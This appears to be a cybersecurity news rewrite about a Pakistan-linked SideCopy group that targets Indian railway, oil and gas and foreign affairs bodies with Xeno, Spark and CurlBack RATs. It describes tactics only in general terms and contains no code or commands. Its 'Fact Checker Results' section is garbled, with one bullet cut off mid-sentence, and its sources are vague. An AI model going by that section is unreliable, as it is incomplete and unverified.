In December 2024, a significant shift was observed in cyberattack strategies targeting various Indian sectors. A hacker group with suspected ties to Pakistan expanded its operations, attacking critical industries such as railway, oil and gas, and foreign affairs ministries. These attacks featured advanced malware families like Xeno RAT, Spark RAT, and the previously undocumented CurlBack RAT. These shifts represent a growing sophistication in cyber warfare tactics, as well as an alarming increase in the targeting of government entities, which had been the group’s focus since at least 2019.
The use of remote access trojans (RATs) has become a hallmark of this group, who have continually adapted their techniques to avoid detection and increase the effectiveness of their operations. The report, confirmed by cybersecurity firm SEQRITE, reveals a steady evolution in both their tools and targets, as the group shifts its methods and malware to exploit both Windows and Linux systems. The group is believed to be a sub-cluster of the notorious Transparent Tribe (APT36), specifically a faction known as SideCopy, which has been active in India for years.
The malware observed has included various forms of RATs, such as Spark RAT, CurlBack RAT, and a custom version of Xeno RAT. The group is noted for its expertise in leveraging sophisticated social engineering techniques, particularly email phishing campaigns designed to deliver malware. These email messages often include lures like railway staff holiday lists or cybersecurity guidelines from the Hindustan Petroleum Corporation Limited (HPCL).
Key Findings
A hacking group linked to Pakistan has been observed targeting Indian sectors with a variety of malware families, including Xeno RAT, Spark RAT, and a new malware called CurlBack RAT. These campaigns targeted critical sectors, particularly government ministries within the railway, oil and gas, and foreign affairs domains.
The attacks signal a shift from previous patterns, notably in how the malware is being deployed. Rather than relying on HTML Application (HTA) files, the group has begun using Microsoft Installer (MSI) packages as a primary method for staging attacks. The group has also made significant strides in expanding its targeting beyond defense and government entities to include sectors like oil and gas.
The malware used in these attacks is designed to target both Windows and Linux systems. The Spark RAT and CurlBack RAT have proven to be versatile tools, capable of stealing data, executing commands, and even gaining elevated system privileges. They also include features such as credential harvesting, stealing browser data, and even copying information from USB drives.
The group has also adopted a multi-pronged approach to infect its targets, using phishing emails as a means of initial compromise, and then dropping malware through decoy files. This complex infection process often involves the use of DLL side-loading, reflective loading, and AES decryption via PowerShell, which all work together to increase the persistence of these attacks.
What Undercode Say: Analysis of the Attacks and Their Implications
The shift in tactics used by this threat actor, from HTA files to MSI packages, reflects an evolving level of sophistication in the way attacks are being staged. MSI packages are often viewed as a more legitimate and less suspicious method for initiating malware payloads, especially in a corporate or governmental setting. This change represents an attempt to circumvent traditional security measures, as MSI files are more likely to be allowed through firewalls and security software than HTA files.
The adoption of multiple RAT families—each with its own specialized capabilities—further demonstrates the group’s maturation. Tools like Xeno RAT, Spark RAT, and CurlBack RAT are highly versatile and customizable, enabling the threat actor to target a wide range of systems and collect vast amounts of sensitive information. This strategy ensures that even if one tool is detected or blocked, others can continue the attack with minimal disruption.
Additionally, the group’s use of phishing as an entry point is a common but still highly effective method. The use of decoy files that seem innocuous, like holiday lists or official documents, makes it easier for the attackers to manipulate employees into opening files and enabling the malware to run. This technique allows the attackers to bypass initial skepticism and gain access to valuable systems.
What sets this group apart is its ability to target both Windows and Linux systems with a cross-platform RAT like Spark RAT. Many cybercriminals tend to focus exclusively on one operating system, but by expanding to Linux, this group demonstrates a broad understanding of the vulnerabilities in both environments.
The malware’s features, such as privilege escalation, data exfiltration, and system command execution, are all geared toward maximizing the attacker’s control over compromised systems. This level of control makes it easier for the group to infiltrate sensitive networks, steal proprietary data, and maintain long-term access to their targets.
Another notable aspect of this group’s strategy is its use of compromised domains and fake websites to host payloads and conduct credential phishing. This approach allows the group to remain under the radar, avoiding detection by traditional security systems that focus primarily on identifying malicious files or attachments.
This tactic also underscores the persistence of the group and its ability to adapt to changing cybersecurity landscapes. Their reliance on open-source malware tools, like Xeno RAT and Spark RAT, shows they are well-versed in using available resources to build a highly effective attack infrastructure.
Finally, the incorporation of advanced techniques such as DLL side-loading, reflective loading, and AES decryption via PowerShell adds an additional layer of complexity to the malware’s execution. These methods ensure that the malware is harder to detect and remove, enabling the attackers to maintain a prolonged presence within their victims’ systems.
Fact Checker Results
– Email Phishing: The
- Malware Families: Xeno RAT, Spark RAT, and CurlBack RAT are legitimate malware families, known for their ability to steal sensitive data, escalate privileges, and execute remote commands on infected systems.
- Targeting Strategy: The expansion from government and defense sectors to industries like oil, gas, and foreign affairs highlights an evolving threat landscape, where critical infrastructure is increasingly at risk.
References:
Reported By: thehackernews.com
Extra Source Hub:
https://www.github.com
Wikipedia
Undercode AI
Image Source:
Pexels
Undercode AI DI v2
